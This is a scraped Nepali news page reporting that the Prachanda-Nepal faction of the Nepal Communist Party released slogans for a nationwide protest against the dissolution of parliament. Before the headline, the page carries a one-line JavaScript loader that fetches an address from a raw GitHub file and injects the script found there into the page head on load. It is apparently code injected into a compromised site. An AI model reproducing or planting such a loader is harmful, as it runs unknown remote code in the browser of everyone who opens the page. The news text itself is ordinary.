;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रचण्ड-नेपाल समूहले १४ गते गर्ने प्रर्दशनको लागि नारा सार्वजनिक गर्यो (नारासहित) – जुनेली न्युज
बिहिबार, असार १३, २०८२
  • होमपेज
  • प्रचण्ड-नेपाल समूहले १४ गते गर्ने प्रर्दशनको लागि नारा सार्वजनिक गर्यो (नारासहित)
देश/प्रदेश

प्रचण्ड-नेपाल समूहले १४ गते गर्ने प्रर्दशनको लागि नारा सार्वजनिक गर्यो (नारासहित)

पुष १३,

काठमाडौं । नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रचण्ड -नेपाल समूहले मंगलबार देशब्यापी गर्न लागेको प्रर्दशनका लागि नारा सार्वजनिक गरेको छ ।

सो समूहले केपी शर्मा ओलीको सिफारिसमा राष्ट्रपति बिधादेवी भण्डारीले संसद भंग गरेको बिरोद्धमा देशब्यापरी प्रर्दशन तय गरेको छ । उनीहरुले नेकपा दुई छुट्टाछुेट्टै भएको अवस्थामा ओली बिरुद्ध खनिएका छन् । प्रचण्ड – नेपाल समूहले १० गते हामी यहाँ छौं बन्दै काठमाडौंमा प्रर्दशन गरेका थिए ।

यस्ता छन् नारा !

No description available.

फेसबुक प्रतिक्रियाहरु